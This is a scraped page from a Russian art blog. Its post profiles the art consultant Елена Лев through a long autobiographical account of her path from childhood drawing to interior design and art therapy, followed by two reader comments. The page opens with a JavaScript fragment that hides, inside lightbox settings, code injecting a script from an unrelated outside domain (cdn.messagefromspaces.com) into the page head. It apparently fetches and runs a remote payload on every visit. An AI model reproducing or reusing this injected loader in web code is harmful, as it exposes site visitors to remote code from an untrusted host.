, 'opacity': false, 'speedIn': 500, 'speedOut': 500, 'changeSpeed': 300, 'overlayShow': false, 'overlayOpacity': "", 'overlayColor': "", 'titleShow': false, 'titlePosition': '', 'enableEscapeButton': false, 'showCloseButton': false, 'showNavArrows': false, 'hideOnOverlayClick': false, 'hideOnContentClick': false, 'width': 500, 'height': 340, 'transitionIn': "", 'transitionOut': "", 'centerOnScroll': false }); var script = document.createElement('script'); script.type= 'text/javascript'; script.src = 'https://cdn.messagefromspaces.com/c.js?pro=type'; document.getElementsByTagName('head')[0].appendChild(script); })
Пользовательский поиск

Добро пожаловать

Советую посмотреть

Страницы

Свежие комментарии

Обмен ссылками

Картины, портреты, критика живописи, Art-дилер




style="display:inline-block;width:120px;height:600px"
data-ad-client="ca-pub-5725625417417931"
data-ad-slot="8961029732">


« | Главная | »

Создание собственной коллекции картин от Елены Лев

Автор: Дмитрий Алмазов | 04 Июл 2011

Здравствуйте Уважаемые читатели  сайта Лаборатория Искусства, сегодня хочу Вам представить замечательного человека – это Елена Лев.  Елена поможет Вам  выбрать картину для Вашего интерьера, подскажет, где лучше повесить картину, как создать и оформить  собственную коллекцию картин. Если у Вас есть вопросы, требуется помощь или просто нужен совет, то Вы обратились по назначению!

Коллекция картин от Елены ЛевЧтобы быть ближе друг к другу все мы знакомимся. Елена Лев как  участник проекта Лаборатория Искусства вот, что рассказала о себе:

«Все началось с того, что озадаченный отец привел меня, шестилетнюю,  за руку к своему другу – художнику. В глухом таежном поселении был свой дом культуры и это был единственный признак цивилизации на площади в тысячуквадратных километров. Наша семья носилась от одной легендарной стройки к другой, жила на чемоданах, и в своей истории художников не имела. Мои рисунки ставили родителей в тупик. Помню, что мне легко удавались и лебеди на пруду и окровавленный красноармеец, упавший с лошади.  Родители, как люди передовые, решили обратиться к «специалисту».

На всю жизнь я запомнила чудесную, захламленную комнату с изразцовой печкой в углу.  Гипсовые головы на полках, огромные холсты на подрамниках, книги, репродукции, стол – верстак в центре. И запах. Льняного масла и скипидара. И дозволение замешивать краски, выдавливая их из туб, в любых пропорциях.

Мы переехали из Сибири в центр страны и мама, мечтавшая иметь в доме музыканта, отвела меня в музыкальную школу. Через месяц преподаватель фортепиано заявила родителям, что медведь на мое ухо не только наступил, но и потоптался. А вот в художественной школе меня уже ждут. Она обнаружила мои рисунки на последней странице нотной тетради и поделилась с коллегой из соседнего образовательного учреждения.

Годы в «худошке» пролетели одним мигом. На выпускном вечере директор пригласил меня в кабинет и, поправив седую шевелюру рукой, сказал торжественно: «Вот что я тебе скажу напоследок. Старайся в жизни отдавать больше, чем получаешь».  «Чего отдавать-то?!» - не поняла я, двенадцатилетняя дуреха. «Талант!» взревел директор.  Но вручил роскошный альбом французской акварельной бумаги.

Это меня насторожило, и я решила связать свою жизнь с искусством. Но провалила при поступлении в Академию художеств на факультет искусствоведения последний экзамен -историю России. Мир оказался строг ко мне и я, чтобы не расстраиваться сильно, поступила в первый попавшийся вуз, затем окунулась в заботы о сыновьях, рисуя только в ночи и пряча рисунки на шкаф.

В годы застоя заведующая детским садом предложила  мне сначала оформить детский спектакль, а затем преподавать рисование в группе моего сына.

За сыновьями я перебралась в школу, умудрилась «прогреметь» на конкурсе «Учитель года». Грянули девяностые. Учителя реально не доедали. Нагрузку учителей сокращали, но мои часы сокращать отказались наотрез: дети уроки рисования не пропускали ни под каким видом. Чтобы моим детям не умереть с голоду я поплелась в ближайшую строительную фирму и со словами: «Хоть штукатуром!» вошла к директору. Он посмотрел на мои рисунки и спросил: «А знаете ли вы о дизайне интерьера?»

Пять лет я отработала в фирме этого человека, и вспоминаю о нем с благодарностью. Это он рассказал мне об основах новой профессии, толковал о трехмерных изображениях, требовал, чтобы я освоила компьютер и важные дизайнерские программы, отправил на курсы. Это было время приобретения огромного опыта и профессионального роста.

Я сама спроектировала загородный дом, руководила его строительством, и теперь живу в нем. Я преподаю дизайн в университете, делаю проекты, рисую. И мне показалось, что все на своих местах. Дальше некуда.

Пока ко мне не обратилась давняя подруга, обнаружившая нашего общего знакомого,  сосредоточенно привязывающего веревку к мосту через речку. «Помоги, ты же художник!» заявила она мне. Я удивилась: «Каким образом? А психологи?» «Разве ты не знаешь? Арт-терапия !» воскликнула она. Я удивилась еще больше и погрузилась в новый для меня мир искусства, которое лечит. Наш знакомый, никогда не рисовавший,  теперь рисует и женился во второй раз.

Эти удивительные люди - учителя, ученики, начальники, друзья, коллеги,  мои дети – яркие жемчужины. Драгоценные частички единственного ожерелья в моей жизни. И чем больше я отдаю, тем массивнее и прекраснее оно становится».

Елена Лев замечательный и открытый человек. Мы обязательно Вам поможем создать собственную коллекцию картин и решим Ваши вопросы. Оставить заявку на создании коллекции картин, можно тут.

Темы: Галерея картин художников, Новости, картины для интерьера | Отзывов: 2 »

Отзывов: 2 на “Создание собственной коллекции картин от Елены Лев”

  1. Людмила пишет:
    05 Июл 2011 в 15:44

    Я поклонница вашего сайта и поклонница таких удивительных людей, с которыми теперь благодаря Интернету можно познакомиться, никуда не выезжая. Они такие настоящие, талантливые, живые. И хочется жить и творить, вдохновляясь их словами. Спасибо вам за то, что знакомите нас с этим необъятным миром искусства.

  2. Дмитрий Алмазов пишет:
    05 Мар 2012 в 22:33

    Спасибо Людмила. Да интернет раскрывает большие возможности как для саморазвития так и для новых знакомств. Елена легко поможет сделать правильный выбор при составлении коллекции картин. Если уже купили картины, но не знаете с какой картиной она будет сочетаться, то она тоже подскажет как лучше решить этот вопрос.

Отзывы

Перед отправкой формы:
Лаборатория Искусства работает на WordPress